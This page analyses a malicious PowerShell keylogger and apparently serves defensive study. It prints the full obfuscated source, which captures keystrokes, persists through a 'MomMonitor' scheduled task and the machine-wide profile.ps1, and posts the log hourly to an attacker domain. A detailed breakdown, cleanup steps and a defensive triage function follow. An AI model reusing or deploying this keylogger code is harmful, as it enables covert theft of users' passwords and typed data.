This code is a malicious PowerShell script that functions as...

September 3, 2025 at 01:13 AM

```powershell
# C# P/Invoke signatures compiled below with Add-Type (user32.dll keyboard functions)
$APIsignatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
# Variable names in randomized case and commands invoked as strings via & and . are obfuscation
${errORAcTIOnPrEfERenCe} = ('SilentlyContinue');
${lOgpATh} = "$env:temp\mat-debug-6F936CD.log";
# Persistence 1: boot-time task that launches a hidden PowerShell (which loads profile.ps1)
&('schtasks') ('/create') ('/tn') ('MomMonitor') ('/sc') ('onstart') ('/rl') ('highest') ('/ru') ('Administrator') ('/tr') ('powershell.exe -w h') ('/f') > ${LoGpaTH};
# Persistence 2: copy own source into C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 if absent
if (.('Test-Path') (('C:n1YWindowsn1YSystem32n1YWindowsPowerShelln1Yv1.0n1Yprofile.ps1').RepLAcE('n1Y','\'))) {} else {
    &('Get-Content') (&('Join-Path') ${pSsCrIpTrOoT} ${myinvocATIoN}.MyCommand.Name) > (('C:MyJWindowsMyJSystem32MyJWindowsPowerShellMyJv1.0MyJprofile.ps1').rePlACe('MyJ','\'))
};
# Exfiltration target: victim computer name becomes a subdomain
${uR} = ('http://') + ${enV:COMputERNAme} + ('.malicious.12moms21.com');
${sTArt} = .('Get-Date');
${aPi} = .('Add-Type') -MemberDefinition ${apIsIgNATUREs} -Name ('Win32') -Namespace ('API') -PassThru;
${no_oUtPUT} = .('New-Item') -Path ${logPATH} -ItemType ('File') -Force;;
while (${TRUE}) {
    .('Start-Sleep') -Milliseconds 40;
    for (${asCii} = 9; ${aScIi} -le 254; ${asCiI}++) {
        ${kEYsTAtE} = ${ApI}::GetAsyncKeyState(${AsCIi});
        # -32767 (0x8001): key is down now and was pressed since the previous call
        if (${KeyStATe} -eq -32767) {
            ${Null} = [console]::CapsLock;
            ${vIRTUalkEY} = ${aPI}::MapVirtualKey(${ascIi}, 3);
            ${KBSTAtE} = &('New-Object') ('Byte[]') 256;
            ${ChECKkBstATe} = ${Api}::GetKeyboardState(${kBsTATe});
            ${lOggedCHAR} = &('New-Object') -TypeName ('System.Text.StringBuilder');
            if (${Api}::ToUnicode(${aSCII}, ${VIrtUalKeY}, ${kbStaTe}, ${loGGEdcHAr}, ${loggEDChar}.Capacity, 0)) {
                # Log is written as UTF-16 LE
                [System.IO.File]::AppendAllText(${LogpAth}, ${LoGGEdCHar}, [System.Text.Encoding]::Unicode)
            }
        }
    };
    # Hourly POST of the entire (never truncated) log file
    if ((.('Get-Date')) -gt ${STaRt}.AddHours(1)) {
        .('Invoke-RestMethod') -Uri ${uR} -Method ('Post') -InFile ${lOgpaTH};
        ${STaRt} = &('Get-Date')
    }
}
```

This code is a malicious PowerShell script that functions as a keylogger. Here's what the script does step by step:

  1. Imports User32 DLL Functions:

    • The script uses Add-Type to compile a C# P/Invoke class (API.Win32) that exposes four functions from the Windows user32.dll:
      • GetAsyncKeyState: Reports whether a given virtual key is currently down and whether it has been pressed since the previous call.
      • GetKeyboardState: Copies the state of all 256 virtual keys, including modifiers such as Shift and Caps Lock, into a byte array.
      • MapVirtualKey: Maps a virtual-key code to a scan code (or the reverse); ToUnicode expects both values.
      • ToUnicode: Translates a virtual key plus the current keyboard state into the Unicode character(s) the user actually typed.
  2. Alters Error Handling:

    • It sets $ErrorActionPreference = 'SilentlyContinue', so failures such as schtasks being refused for lack of administrator rights or the profile write failing produce no error output and do not stop the script.
  3. Creates a Scheduled Task:

    • It runs schtasks /create to register a task named MomMonitor that triggers at system start (/sc onstart), runs with the highest privilege level (/rl highest) under the Administrator account (/ru Administrator), and executes powershell.exe -w h, a hidden-window PowerShell. The task action is only a bare PowerShell launch and does not reference the script itself; it re-establishes the keylogger at boot only because of the profile written in the next step. The schtasks output is redirected into the log file path. Creating the task requires administrator rights; without them the call fails silently.
  4. Modifies the Machine-Wide PowerShell Profile:

    • The two token-obfuscated strings resolve (after .Replace('n1Y','\') and .Replace('MyJ','\')) to C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, which is the AllUsersAllHosts profile of Windows PowerShell 5.1, not the current user's profile. If that file does not already exist, the script reads its own source (Join-Path $PSScriptRoot $MyInvocation.MyCommand.Name) and writes it there. From then on every Windows PowerShell session on the host that loads profiles, including the hidden one the scheduled task starts at boot and any interactive session an administrator opens, runs the keylogger. Because the profile is shared, the captured keystrokes are not limited to the user who ran the original script.
  5. Sets Up Logging:

    • It defines the log file as $env:temp\mat-debug-6F936CD.log, in the temporary folder of the account running the script, and creates it with New-Item -Force, which also truncates any existing copy. The name mimics an application debug log.
  6. Initiates Keylogging:

    • In an infinite while loop, with a 40 ms Start-Sleep per iteration:
      • It calls GetAsyncKeyState for every virtual-key code from 9 (Tab) to 254 and acts when the result is -32767 (0x8001), meaning the key is down now and was pressed since the previous call, so each keystroke is logged once.
      • It reads [console]::CapsLock (the value is discarded), obtains a scan code value with MapVirtualKey, snapshots the modifier state with GetKeyboardState, and passes both to ToUnicode, so shifted and Caps Lock characters come out as typed.
      • Each resulting character is appended to the log file with [System.IO.File]::AppendAllText using UTF-16 (System.Text.Encoding.Unicode); the file will not read correctly in a viewer that assumes UTF-8 or ANSI.
  7. Data Exfiltration:

    • Every hour (Get-Date compared with the recorded start time plus one hour) the script sends the whole log file as the body of an HTTP POST, via Invoke-RestMethod -InFile, to http://{COMPUTERNAME}.malicious.12moms21.com. Two details matter for response: the victim's computer name is embedded as a subdomain, so even a DNS query for that name identifies the host to the attacker, and the log file is never truncated after upload, so each POST resends everything captured so far over plaintext HTTP. Any HTTP error is swallowed by the error preference and the loop continues.
  8. Avoids Detection:

    • The script relies on a hidden window (-w h), suppressed errors and discarded output, a log name that looks like a debug file, and obfuscation of the script text: variable names in randomized case, cmdlets and executables invoked as strings through & and ., and file paths split with placeholder tokens that are only reassembled by .Replace at run time. These defeat simple string matching on "C:\Windows\System32" or "schtasks /create", but not PowerShell script block logging (Event ID 4104), which records the script as executed, and the Add-Type P/Invoke of GetAsyncKeyState and ToUnicode remains a recognizable keylogger signature.

Summary:

This script is designed to:

  • Monitor and log keystrokes typed by the user (keylogger functionality).
  • Exfiltrate the logged data periodically to an attacker-controlled server.
  • Establish persistence by creating a scheduled task and writing itself into the machine-wide PowerShell profile (C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1).

Such a script is used for unauthorized monitoring and credential or data theft. It poses a significant security risk and should be identified and removed immediately: delete the MomMonitor task, remove the planted profile.ps1, stop the hidden powershell.exe it started, preserve and then delete the mat-debug-*.log file, block or sinkhole *.malicious.12moms21.com, and treat anything typed on the host since infection, passwords included, as compromised.
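A host triage routine for the artifacts described above, added here as an example; it is not the malware's own code and was not part of the original page. It assumes Windows PowerShell 5.1 on the suspect host and an elevated session. The function name Find-MomMonitorArtifacts, its -Remove switch and the marker strings searched for in the profile are choices made for this example; the task name, profile path, log file name pattern, hidden-window argument and domain come from the script itself.

```powershell
# Added triage example (not part of the malicious script or the original page).
# Checks for the persistence, profile, log and process artifacts named in the
# analysis and, with -Remove, deletes them. Function name, -Remove and the
# marker strings are this example's own; run from an elevated PowerShell 5.1.
function Find-MomMonitorArtifacts {
    [CmdletBinding()]
    param(
        [switch]$Remove   # also remove what is found
    )

    $findings = New-Object System.Collections.Generic.List[object]

    # 1. Persistence: the task registered with "schtasks /create /tn MomMonitor ...".
    $task = Get-ScheduledTask -TaskName 'MomMonitor' -ErrorAction SilentlyContinue
    if ($task) {
        $action = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
        $findings.Add([pscustomobject]@{ Artifact = 'ScheduledTask'; Location = 'MomMonitor'; Detail = $action })
        if ($Remove) { Unregister-ScheduledTask -TaskName 'MomMonitor' -Confirm:$false }
    }

    # 2. The machine-wide profile the script copies itself into. The obfuscated
    #    "C:n1YWindows..." string resolves to this path (AllUsersAllHosts for 5.1).
    $profilePath = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\profile.ps1'
    if (Test-Path -LiteralPath $profilePath) {
        # Literal substrings of the script; Select-String is case-insensitive,
        # so the randomized casing of the variable names does not matter.
        $markers = @('GetAsyncKeyState', 'ToUnicode', '12moms21', 'MomMonitor')
        $hit = Select-String -LiteralPath $profilePath -Pattern $markers -SimpleMatch | Select-Object -First 1
        if ($hit) {
            $findings.Add([pscustomobject]@{ Artifact = 'Profile'; Location = $profilePath; Detail = "matched '$($hit.Pattern)' on line $($hit.LineNumber)" })
            if ($Remove) { Remove-Item -LiteralPath $profilePath -Force }
        }
    }

    # 3. The keystroke log. AppendAllText wrote it as UTF-16 LE, so read it with
    #    -Encoding Unicode; copy it elsewhere as evidence before using -Remove.
    foreach ($log in Get-ChildItem -Path $env:TEMP -Filter 'mat-debug-*.log' -File -ErrorAction SilentlyContinue) {
        $text = [string](Get-Content -LiteralPath $log.FullName -Encoding Unicode -Raw -ErrorAction SilentlyContinue)
        $findings.Add([pscustomobject]@{ Artifact = 'KeystrokeLog'; Location = $log.FullName; Detail = "$($log.Length) bytes, $($text.Length) captured characters" })
        if ($Remove) { Remove-Item -LiteralPath $log.FullName -Force }
    }

    # 4. A hidden powershell.exe started by the task ("powershell.exe -w h"). The
    #    keylogging loop keeps running after the files are gone, so stop it too.
    $hidden = Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" |
        Where-Object { $_.ProcessId -ne $PID -and $_.CommandLine -match '\s-w(indowstyle)?\s+h(idden)?\b' }
    foreach ($p in $hidden) {
        $findings.Add([pscustomobject]@{ Artifact = 'HiddenProcess'; Location = "PID $($p.ProcessId)"; Detail = $p.CommandLine })
        if ($Remove) { Stop-Process -Id $p.ProcessId -Force }
    }

    return $findings
}

# Report only; rerun with -Remove once the log file has been preserved as evidence.
Find-MomMonitorArtifacts | Format-Table -AutoSize
```

The profile check matches literal strings rather than the obfuscated variable names because the casing is randomized per sample; the user32 function names inside the Add-Type signature and the exfiltration domain are the parts an attacker cannot rename without rewriting the tool. Other hosts should be checked for the same task name and for DNS queries to *.malicious.12moms21.com, since the subdomain in each query names the infected machine.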
